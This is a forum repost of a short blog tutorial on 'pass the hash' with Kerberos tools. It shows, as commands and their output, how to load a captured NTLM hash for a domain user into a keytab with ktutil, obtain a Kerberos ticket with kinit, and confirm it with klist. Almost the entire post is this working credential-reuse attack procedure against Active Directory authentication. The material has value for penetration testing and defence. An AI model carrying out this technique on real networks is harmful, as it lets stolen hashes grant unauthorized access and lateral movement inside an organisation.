Nytro Posted July 30, 2018 Report Posted July 30, 2018 Pass the Hash with Kerberos Jul 24, 2018 This blog post may be of limited use, most of the time, when you have an NTLM hash, you also have the tools to use it. But, if you find yourself in a situation where you don’t have the tools and do happen to have kerberos tools, you can pass the hash with it. Lets say with have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29. The first step to do so is to create a keytab file using ktutil: root@wpad:~# ktutil At the ktutil prompt, type in the “add entry” (addent) command with the “principals” (-p) flag. Specify the user and an all uppercase version of the FQDN. Then the “KVNO” (-k 1), which is the key number. Finally the encryption type, which is rc4-hmac for NTLM hashes: ktutil: addent -p uberuser@CORP.SOMEWHATREALNEWS.COM -k 1 -key -e rc4-hmac After you hit enter you’ll get prompted for the rc4-hmac (NTLM) hash: Key for uberuser@CORP.SOMEWHATREALNEWS.COM (hex): 88e4d9fabaecf3dec18dd80905521b29 Then we write the keytab file to disk and exit ktutil ktutil: wkt /tmp/a.keytab ktutil: exit The last step before we can use our authentication is to create a kerberos ticket using our keytab file. root@wpad:~# kinit -V -k -t /tmp/a.keytab -f uberuser@CORP.SOMEWHATREALNEWS.COM Using default cache: /tmp/krb5cc_0 Using principal: uberuser@CORP.SOMEWHATREALNEWS.COM Using keytab: /tmp/a.keytab Authenticated to Kerberos v5 Validate it with klist: root@wpad:~# klist Ticket cache: FILE:/tmp/krb5cc_0 Default principal: uberuser@CORP.SOMEWHATREALNEWS.COM Valid starting Expires Service principal 07/22/2018 21:38:43 07/23/2018 07:38:43 krbtgt/CORP.SOMEWHATREALNEWS.COM@CORP.SOMEWHATREALNEWS.COM renew until 07/23/2018 21:38:40 Sursa: https://malicious.link/post/2018/pass-the-hash-with-kerberos/ Quote
